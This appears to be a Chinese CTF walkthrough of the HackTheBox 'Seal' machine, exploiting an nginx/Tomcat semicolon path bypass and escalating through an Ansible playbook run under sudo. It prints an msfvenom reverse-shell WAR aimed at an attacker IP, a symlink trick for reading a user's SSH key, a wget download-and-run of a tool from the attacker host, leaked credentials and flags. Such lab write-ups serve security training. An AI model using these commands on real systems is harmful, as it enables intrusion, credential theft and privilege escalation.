Nginx-Tomcat 配置错误漏洞利用与权限提升完整指南<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

目标IP: 10.10.10.250<\/code> 开放端口:<\/p>


22\/tcp - OpenSSH 8.2p1 (Ubuntu)<\/li>
443\/tcp - nginx 1.18.0 (Ubuntu)<\/li>
8080\/tcp - http-proxy (Tomcat)<\/li>
<\/ul>
SSL证书信息:<\/p>
commonName=seal.htb
organizationName=Seal Pvt Ltd
stateOrProvinceName=London
countryName=UK
有效期: 2021-05-05 至 2022-05-05
<\/code><\/pre>
1.2 服务识别<\/h3>

8080端口<\/strong>: Tomcat服务，需要认证(401 Unauthorized)<\/li>
443端口<\/strong>: Nginx服务，返回400错误(HTTP请求发送到HTTPS端口)<\/li>
<\/ul>
2. 漏洞发现与利用<\/h2>
2.1 GitBucket配置泄露<\/h3>
访问: http:\/\/10.10.10.250:8080\/signin;jsessionid=node01a58x8lkg5rxz7li3qedmuhh137.node0?redirect=%2F<\/code><\/p>
发现GitBucket仓库中的敏感信息:<\/p>

用户凭证: tomcat:42MrHBf*z8{Z%<\/code><\/li>
配置文件: http:\/\/10.10.10.250:8080\/root\/seal_market\/blob\/master\/nginx\/sites-enabled\/default<\/code><\/li>
<\/ul>
2.2 Nginx-Tomcat路径处理不当漏洞<\/h3>
漏洞原理<\/strong>:<\/p>

Nginx配置将请求代理到本地的8000端口<\/li>
Nginx保留URL中的分号(;)及其后参数<\/li>
Tomcat将分号后的内容视为"路径参数"，不作为实际路径的一部分<\/li>
<\/ol>
示例<\/strong>:<\/p>
http:\/\/127.0.0.1:8000\/test;tttt\/aaad
Tomcat实际解析为: http:\/\/127.0.0.1:8000\/test\/aaad
<\/code><\/pre>
2.3 漏洞利用步骤<\/h3>


访问Tomcat管理界面<\/strong>:<\/p>
https:\/\/10.10.10.250\/;fuck\/manager\/html
<\/code><\/pre>
<\/li>

生成反向shell war文件<\/strong>:<\/p>
msfvenom -p java\/shell_reverse_tcp lhost=<\/span>10.10.16.15 lport=<\/span>443<\/span> -f war -o shell.war
<\/span><\/span><\/code><\/pre><\/li>

上传war文件<\/strong>:<\/p>
\/manager\/.;\/html\/upload?org.apache.catalina.filters.CSRF_NONCE=4B107F08CB2ABE4C1BF1912236D0141C
<\/code><\/pre>
<\/li>

执行shell<\/strong>:<\/p>
curl https:\/\/10.10.10.250\/;aaa\/shell\/
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 权限提升阶段<\/h2>
3.1 从Tomcat到用户luis<\/h3>
发现Ansible playbook存在符号链接漏洞:<\/p>
ln -s \/home\/luis\/ \/var\/lib\/tomcat9\/webapps\/ROOT\/admin\/dashboard\/uploads\/hacked
<\/span><\/span><\/code><\/pre>获取luis用户的SSH私钥:<\/p>
cat \/tmp\/dashboard\/uploads\/hacked\/.ssh\/id_rsa
<\/span><\/span><\/code><\/pre>获取用户flag:<\/p>
2a141da309192304f7a66987be277f1b
<\/code><\/pre>
3.2 使用TRP00F工具<\/h3>
项目地址: https:\/\/github.com\/MartinxMax\/trp00f<\/code><\/p>
3.3 使用Ansible-playbook和SKBD提权<\/h3>


检查sudo权限<\/strong>:<\/p>
sudo -l
<\/span><\/span><\/code><\/pre><\/li>

创建恶意playbook文件(maptnh.yml)<\/strong>:<\/p>
- hosts<\/span>: localhost<\/span>
<\/span><\/span>  tasks<\/span>:
<\/span><\/span>  - name<\/span>: map<\/span>
<\/span><\/span>    shell<\/span>: bash -c '\/tmp\/skbd.sh -e "https:\/\/10.10.16.15:9191"'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

下载并执行SKBD工具<\/strong>:<\/p>
wget http:\/\/10.10.16.15:9919\/skbd.sh;chmod +x skbd.sh
<\/span><\/span>sudo \/usr\/bin\/ansible-playbook maptnh.yml
<\/span><\/span><\/code><\/pre><\/li>

SKBD交互<\/strong>:<\/p>
SKBD # info
SKBD # use 1
SKBD[8e7b2e7692df48faa4e42d6cfc791ed2]# show
SKBD[8e7b2e7692df48faa4e42d6cfc791ed2]# run
SKBD[8e7b2e7692df48faa4e42d6cfc791ed2]# set user luis
SKBD[8e7b2e7692df48faa4e42d6cfc791ed2]# run
<\/code><\/pre>
<\/li>
<\/ol>
获取root flag:<\/p>
b68b96c9181b1160397344db3010b66a
<\/code><\/pre>
4. 关键工具与资源<\/h2>

SKBD项目<\/strong>: https:\/\/github.com\/MartinxMax\/skbd<\/code><\/li>
TRP00F项目<\/strong>: https:\/\/github.com\/MartinxMax\/trp00f<\/code><\/li>
Ansible调试参考<\/strong>: https:\/\/serverfault.com\/questions\/537060\/how-to-see-stdout-of-ansible-commands<\/code><\/li>
<\/ol>
5. 总结<\/h2>
本渗透测试过程展示了如何利用Nginx-Tomcat配置不当漏洞获取初始访问权限，然后通过符号链接漏洞和Ansible playbook提权获取系统完全控制权。关键点包括:<\/p>

识别和利用路径解析不一致漏洞<\/li>
利用GitBucket泄露的凭证<\/li>
使用符号链接攻击横向移动<\/li>
滥用Ansible playbook执行权限进行特权提升<\/li>
<\/ol>

Nginx-Tomcat 配置错误漏洞利用与权限提升完整指南<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞发现与利用<\/h2>

3. 权限提升阶段<\/h2>

3.2 使用TRP00F工具<\/h3> 项目地址: https:\/\/github.com\/MartinxMax\/trp00f<\/code><\/p>

3.2 使用TRP00F工具<\/h3>
项目地址: `https:\/\/github.com\/MartinxMax\/trp00f<\/code><\/p>`